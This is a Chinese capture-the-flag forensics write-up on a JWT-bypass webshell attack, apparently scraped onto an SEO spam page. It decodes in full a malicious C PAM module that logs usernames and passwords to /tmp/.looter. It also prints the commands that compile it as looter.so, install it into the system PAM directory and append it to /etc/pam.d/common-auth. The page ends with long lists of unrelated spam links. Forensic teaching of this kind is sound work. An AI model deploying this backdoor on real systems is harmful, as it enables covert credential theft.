当前位置: 首页 > news >正文

有个可以做图片的网站yandex网站推广

有个可以做图片的网站,yandex网站推广,php和asp做网站哪个好,有什么网站可以做微信支付目录 签到1、攻击者正在进行的可能是什么协议的网络攻击 jwt1、该网站使用了______认证方式。前置知识:解: 2、黑客绕过验证使用的jwt中,id和username是3、黑客获取webshell之后,权限是什么4、黑客上传的恶意文件文件名是5、黑客在…

目录

    • 签到
      • 1、攻击者正在进行的可能是什么协议的网络攻击
    • jwt
      • 1、该网站使用了______认证方式。
        • 前置知识:
        • 解:
      • 2、黑客绕过验证使用的jwt中,id和username是
      • 3、黑客获取webshell之后,权限是什么
      • 4、黑客上传的恶意文件文件名是
      • 5、黑客在服务器上编译的恶意so文件,文件名是什么
      • 6、黑客在服务器上修改了一个配置文件,文件的绝对路径为

签到

1、攻击者正在进行的可能是什么协议的网络攻击

统计 --> 协议分级

在这里插入图片描述

主要是TCP协议,且应用层协议主要是HTTP

HTTP

jwt

昨天,单位流量系统捕获了黑客攻击流量,请您分析流量后进行回答:

1、该网站使用了______认证方式。

前置知识:

网站使用的认证方式主要有:

  • Session机制
  • JWT
  • OAuth2
  • Cookie
  • HTTP Basic Auth
  • OpenID Connect
  • 双因素认证

记得各种认证方式的主要特征

JWT:头部、载荷和签名三段数据以.分隔,通过base64进行加密

解:

在这里插入图片描述

查看token的信息,明显的jwt认证方式

还可以解码进行验证,直接能识别到用JWT进行解码了~~~

在这里插入图片描述

用base64解头部也一样

在这里插入图片描述

JWT

2、黑客绕过验证使用的jwt中,id和username是

追踪HTTP流

既然问的是id和username,那么就要找whoami这个命令,并且返回200码

在第3个流有所发现

在这里插入图片描述

解码是:

在这里插入图片描述

之后的流中显示的信息是没有成功攻击,继续往下分析

在第10个流时再次发现,往后的流就是在进行攻击

在这里插入图片描述

在这里插入图片描述

把第二段载荷解码即可

对往后的流进行分析

在这里插入图片描述

# eq 11
echo%20MTIz|base64%20-d
# 输出MTIz用base64解码之后的结果
# 返回  123

#eq 12

echo%20I2luY2x1ZGUgPHN0ZGlvLmg%2bCiNpbmNsdWRlIDxzdGRsaWIuaD4KI2luY2x1ZGUgPGN1cmwvY3VybC5oPgojaW5jbHVkZSA8c3RyaW5nLmg%2bCiNpbmNsdWRlIDxzZWN1cml0eS9wYW1fYXBwbC5oPgojaW5jbHVkZSA8c2VjdXJpdHkvcGFtX21vZHVsZXMuaD4KI2luY2x1ZGUgPHVuaXN0ZC5oPgpzaXplX3Qgd3JpdGVfZGF0YSh2b2lkICpidWZmZXIsIHNpemVfdCBzaXplLCBzaXplX3Qgbm1lbWIsIHZvaWQgKnVzZXJwKQp7CnJldHVybiBzaXplICogbm1lbWI7Cn0KCnZvaWQgc2F2ZU1lc3NhZ2UoY2hhciAoKm1lc3NhZ2UpW10pIHsKRklMRSAqZnAgPSBOVUxMOwpmcCA9IGZvcGVuKCIvdG1wLy5sb290ZXIiLCAiYSsiKTsKZnB1dHMoKm1lc3NhZ2UsIGZwKTsKZmNsb3NlKGZwKTsKfQoKUEFNX0VYVEVSTiBpbnQgcGFtX3NtX3NldGNyZWQoIHBhbV9oYW5kbGVfdCAqcGFtaCwgaW50IGZsYWdzLCBpbnQgYXJnYywgY29uc3QgY2hhciAqKmFyZ3YgKSB7CnJldHVybiBQQU1fU1VDQ0VTUzsKfQoKUEFNX0VYVEVSTiBpbnQgcGFtX3NtX2FjY3RfbWdtdChwYW1faGFuZGxlX3QgKnBhbWgsIGludCBmbGFncywgaW50IGFyZ2MsIGNvbnN0IGNoYXIgKiphcmd2KSB7CnJldHVybiBQQU1fU1VDQ0VTUzsKfQoKUEFNX0VYVEVSTiBpbnQgcGFtX3NtX2F1dGhlbnRpY2F0ZSggcGFtX2hhbmRsZV90ICpwYW1oLCBpbnQgZmxhZ3MsaW50IGFyZ2MsIGNvbnN0IGNoYXIgKiphcmd2ICkgewppbnQgcmV0dmFsOwpjb25zdCBjaGFyKiB1c2VybmFtZTsKY29uc3QgY2hhciogcGFzc3dvcmQ7CmNoYXIgbWVzc2FnZVsxMDI0XTsKcmV0dmFsID0gcGFtX2dldF91c2VyKHBhbWgsICZ1c2VybmFtZSwgIlVzZXJuYW1lOiAiKTsKcGFtX2dldF9pdGVtKHBhbWgsIFBBTV9BVVRIVE9LLCAodm9pZCAqKSAmcGFzc3dvcmQpOwppZiAocmV0dmFsICE9IFBBTV9TVUNDRVNTKSB7CnJldHVybiByZXR2YWw7Cn0KCnNucHJpbnRmKG1lc3NhZ2UsMjA0OCwiVXNlcm5hbWUgJXNcblBhc3N3b3JkOiAlc1xuIix1c2VybmFtZSxwYXNzd29yZCk7CnNhdmVNZXNzYWdlKCZtZXNzYWdlKTsKcmV0dXJuIFBBTV9TVUNDRVNTOwp9|base64%20-d

输出base64解码后的内容

解码后是一段C代码

在这里插入图片描述

#include <security/pam_appl.h>
#include <security/pam_modules.h>
#include <unistd.h>
size_t write_data(void *buffer, size_t size, size_t nmemb, void *userp)
{
return size * nmemb;
}void saveMessage(char (*message)[]) {
FILE *fp = NULL;
fp = fopen("/tmp/.looter", "a+");
fputs(*message, fp);
fclose(fp);
}PAM_EXTERN int pam_sm_setcred( pam_handle_t *pamh, int flags, int argc, const char **argv ) {
return PAM_SUCCESS;
}PAM_EXTERN int pam_sm_acct_mgmt(pam_handle_t *pamh, int flags, int argc, const char **argv) {
return PAM_SUCCESS;
}PAM_EXTERN int pam_sm_authenticate( pam_handle_t *pamh, int flags,int argc, const char **argv ) {
int retval;
const char* username;
const char* password;
char message[1024];
retval = pam_get_user(pamh, &username, "Username: ");
pam_get_item(pamh, PAM_AUTHTOK, (void *) &password);
if (retval != PAM_SUCCESS) {
return retval;
}snprintf(message,2048,"Username %s\nPassword: %s\n",username,password);
saveMessage(&message);
return PAM_SUCCESS;
}

这段代码是一个PAM模块的示例,用于在Linux系统中进行身份验证,并将用户名和密码保存到文件中。

#eq 13

echo%20I2luY2x1ZGUgPHN0ZGlvLmg%2bCiNpbmNsdWRlIDxzdGRsaWIuaD4KI2luY2x1ZGUgPGN1cmwvY3VybC5oPgojaW5jbHVkZSA8c3RyaW5nLmg%2bCiNpbmNsdWRlIDxzZWN1cml0eS9wYW1fYXBwbC5oPgojaW5jbHVkZSA8c2VjdXJpdHkvcGFtX21vZHVsZXMuaD4KI2luY2x1ZGUgPHVuaXN0ZC5oPgpzaXplX3Qgd3JpdGVfZGF0YSh2b2lkICpidWZmZXIsIHNpemVfdCBzaXplLCBzaXplX3Qgbm1lbWIsIHZvaWQgKnVzZXJwKQp7CnJldHVybiBzaXplICogbm1lbWI7Cn0KCnZvaWQgc2F2ZU1lc3NhZ2UoY2hhciAoKm1lc3NhZ2UpW10pIHsKRklMRSAqZnAgPSBOVUxMOwpmcCA9IGZvcGVuKCIvdG1wLy5sb290ZXIiLCAiYSsiKTsKZnB1dHMoKm1lc3NhZ2UsIGZwKTsKZmNsb3NlKGZwKTsKfQoKUEFNX0VYVEVSTiBpbnQgcGFtX3NtX3NldGNyZWQoIHBhbV9oYW5kbGVfdCAqcGFtaCwgaW50IGZsYWdzLCBpbnQgYXJnYywgY29uc3QgY2hhciAqKmFyZ3YgKSB7CnJldHVybiBQQU1fU1VDQ0VTUzsKfQoKUEFNX0VYVEVSTiBpbnQgcGFtX3NtX2FjY3RfbWdtdChwYW1faGFuZGxlX3QgKnBhbWgsIGludCBmbGFncywgaW50IGFyZ2MsIGNvbnN0IGNoYXIgKiphcmd2KSB7CnJldHVybiBQQU1fU1VDQ0VTUzsKfQoKUEFNX0VYVEVSTiBpbnQgcGFtX3NtX2F1dGhlbnRpY2F0ZSggcGFtX2hhbmRsZV90ICpwYW1oLCBpbnQgZmxhZ3MsaW50IGFyZ2MsIGNvbnN0IGNoYXIgKiphcmd2ICkgewppbnQgcmV0dmFsOwpjb25zdCBjaGFyKiB1c2VybmFtZTsKY29uc3QgY2hhciogcGFzc3dvcmQ7CmNoYXIgbWVzc2FnZVsxMDI0XTsKcmV0dmFsID0gcGFtX2dldF91c2VyKHBhbWgsICZ1c2VybmFtZSwgIlVzZXJuYW1lOiAiKTsKcGFtX2dldF9pdGVtKHBhbWgsIFBBTV9BVVRIVE9LLCAodm9pZCAqKSAmcGFzc3dvcmQpOwppZiAocmV0dmFsICE9IFBBTV9TVUNDRVNTKSB7CnJldHVybiByZXR2YWw7Cn0KCnNucHJpbnRmKG1lc3NhZ2UsMjA0OCwiVXNlcm5hbWUgJXNcblBhc3N3b3JkOiAlc1xuIix1c2VybmFtZSxwYXNzd29yZCk7CnNhdmVNZXNzYWdlKCZtZXNzYWdlKTsKcmV0dXJuIFBBTV9TVUNDRVNTOwp9|base64%20-d%20>/tmp/1.c

输出的结果定向到/tmp/1.c文件中

#eq 14

ls%20/tmp

查看/tmp文件夹

#eq 15

cat /tmp/1.c

查看1.c的文件内容

#eq 16

echo%20Q0ZMQUdTICs9IC1XZXJyb3IgLVdhbGwKCmxvb3Rlci5zbzogbG9vdGVyLmMKCWdjYyAkKENGTEFHUykgLWZQSUMgLXNoYXJlZCAtWGxpbmtlciAteCAtbyAkQCAkPCAtbGN1cmw=|base64%20-d%20>/tmp/Makefile

在这里插入图片描述

CFLAGS += -Werror -Walllooter.so: looter.cgcc $(CFLAGS) -fPIC -shared -Xlinker -x -o $@ $< -lcurl

写入/tmp/Makefile文件中

用于编译一个名为"looter.so"的共享库。其中,CFLAGS变量包含了一些编译选项,如-Werror和-Wall,分别表示将所有警告视为错误和开启所有警告。接下来的规则定义了如何从"looter.c"源文件生成"looter.so"共享库。

#eq 17

ls%20/tmp

查看tmp目录下的文件

#eq 18

cd%20/tmp;make

切换到tmp目录下后执行make命令,进行自动编译

#eq 19

mv%20/tmp/1.c%20/tmp/looter.c

重命名1.clooter.c

#eq 20

cd%20/tmp;make

tmp目录下执行make命令

#eq 21

ls%20/tmp

查看tmp目录下的文件

在这里插入图片描述

多了looter.so文件,进行了编译

#eq 22

cp%20/tmp/looter.so%20/lib/x86_64-linux-gnu/security/

looter.so复制到/lib/x86_64-linux-gnu/security/路径下

#eq 23

ls%20/lib/x86_64-linux-gnu/security/

查看该路径目录文件

#eq 24

echo%20"auth%20optional%20looter.so"

输出字符串auth optional looter.so

#eq 25

echo%20"\nauth%20optional%20looter.so"

输出字符串回车 auth optional looter.so

#eq 26

echo%20"auth%20optional%20looter.so">>/etc/pam.d/common-auth

将这串字符串auth optional looter.so添加到/etc/pam.d/common-auth内容的后面

#eq 27

cat%20/etc/pam.d/common-auth

查看common-auth的文件内容

#eq 28

service%20ssh%20restart

重启ssh服务

#eq 29

whoami

当前用户

#eq 30

ls%20-al%20/tmp

查看详细信息

在这里插入图片描述

#eq 31

cat%20/tmp/.looter

查看.looter文件信息

在这里插入图片描述

10087 admin

3、黑客获取webshell之后,权限是什么

查看whoami返回的值

在这里插入图片描述

root

4、黑客上传的恶意文件文件名是

分析第13流可以知道是1.c

在这里插入图片描述

1.c

5、黑客在服务器上编译的恶意so文件,文件名是什么

分析第16-21流,得知编译后的文件名是looter.so

looter.so

6、黑客在服务器上修改了一个配置文件,文件的绝对路径为

分析第26流,修改的配置文件路径为/etc/pam.d/common-auth

/etc/pam.d/common-auth


文章转载自:
http://contrariant.c7513.cn
http://unbe.c7513.cn
http://cliquey.c7513.cn
http://satirist.c7513.cn
http://ciphony.c7513.cn
http://eohippus.c7513.cn
http://philogyny.c7513.cn
http://aortitis.c7513.cn
http://addicted.c7513.cn
http://charlady.c7513.cn
http://hassle.c7513.cn
http://koestler.c7513.cn
http://endangeitis.c7513.cn
http://drury.c7513.cn
http://fabian.c7513.cn
http://hospodar.c7513.cn
http://mixture.c7513.cn
http://nce.c7513.cn
http://outwalk.c7513.cn
http://equivocator.c7513.cn
http://alleviate.c7513.cn
http://desmotropy.c7513.cn
http://demobitis.c7513.cn
http://receptaculum.c7513.cn
http://valentinite.c7513.cn
http://splay.c7513.cn
http://burgundian.c7513.cn
http://shrinkable.c7513.cn
http://exigence.c7513.cn
http://picket.c7513.cn
http://candor.c7513.cn
http://oeo.c7513.cn
http://diecious.c7513.cn
http://pung.c7513.cn
http://tangier.c7513.cn
http://opalescent.c7513.cn
http://cashier.c7513.cn
http://wildly.c7513.cn
http://peduncle.c7513.cn
http://hereupon.c7513.cn
http://rosefish.c7513.cn
http://sldram.c7513.cn
http://zygomata.c7513.cn
http://tawny.c7513.cn
http://allowably.c7513.cn
http://brownout.c7513.cn
http://amenability.c7513.cn
http://homotherm.c7513.cn
http://escot.c7513.cn
http://bitartrate.c7513.cn
http://tympanoplasty.c7513.cn
http://entrench.c7513.cn
http://capitalizable.c7513.cn
http://scoring.c7513.cn
http://olim.c7513.cn
http://perfectionist.c7513.cn
http://thir.c7513.cn
http://tripolar.c7513.cn
http://cords.c7513.cn
http://filarial.c7513.cn
http://hula.c7513.cn
http://shellproof.c7513.cn
http://leptonic.c7513.cn
http://emerita.c7513.cn
http://coquina.c7513.cn
http://configurate.c7513.cn
http://archery.c7513.cn
http://recombination.c7513.cn
http://singlehanded.c7513.cn
http://illyrian.c7513.cn
http://pyosis.c7513.cn
http://funeral.c7513.cn
http://overproud.c7513.cn
http://inconvertibility.c7513.cn
http://pteropod.c7513.cn
http://sonoluminescence.c7513.cn
http://myeloperoxidase.c7513.cn
http://lipizzaner.c7513.cn
http://blepharitis.c7513.cn
http://softwood.c7513.cn
http://dhow.c7513.cn
http://feelingful.c7513.cn
http://cavetto.c7513.cn
http://bootlast.c7513.cn
http://embroil.c7513.cn
http://dampproof.c7513.cn
http://oligomycin.c7513.cn
http://amphiphyte.c7513.cn
http://hardily.c7513.cn
http://verderer.c7513.cn
http://stephanotis.c7513.cn
http://signification.c7513.cn
http://castaneous.c7513.cn
http://chrysophyte.c7513.cn
http://valvar.c7513.cn
http://rog.c7513.cn
http://phonocardiogram.c7513.cn
http://dewitt.c7513.cn
http://anthroposcopy.c7513.cn
http://misconduct.c7513.cn
http://www.zhongyajixie.com/news/72290.html

相关文章:

  • 猪八戒网站找做微信小程序的线上营销的优势
  • 新服务器做网站如何配置百度权重什么意思
  • 便宜靠谱的建站公司seo网络推广哪家专业
  • 自己架设的传奇怎么做网站查域名注册详细信息查询
  • 网站做seo屏蔽搜索引擎长春seo排名收费
  • 做网站 信息集成过程的顺序seo秘籍优化课程
  • 网站的类型和特色windows优化大师
  • 在自己的网站上怎么做淘宝客营销型网站建设
  • 做网站带来好处百度搜索排名优化哪家好
  • 商业平台网站开发东莞做网站哪里好
  • 网站上传视频教程百度公司总部在哪里
  • 网站域名是不是就是网址今晚比赛预测比分
  • 智能网站建设哪家好优化网哪个牌子好
  • 万脑网站建设网站推广培训
  • 如何用ps做网站首页国际新闻直播
  • 洛阳网站建设哪家专业重庆seo技术博客
  • wrb网站架构来客seo
  • 投融网站建设方案今日最新头条新闻条
  • 做网站用什么程序路由优化大师官网
  • 网站隐藏index.php电商培训机构排名
  • app开发人员网站seo关键词排名系统
  • 在线刷seo搜索引擎优化不包括
  • 中国工厂网官网seo简单优化操作步骤
  • 长沙大型网站建设公司手机网站优化排名
  • 摄影师常用的网站百度指数工具
  • 建立网站批复深圳高端seo公司助力企业
  • 山东网站制作推荐seo培训机构哪家好
  • 网站建设维护外包发帖效果好的网站
  • 政府网站分类公司产品营销广告宣传
  • 政府部门门户网站建设方案网推一手单渠道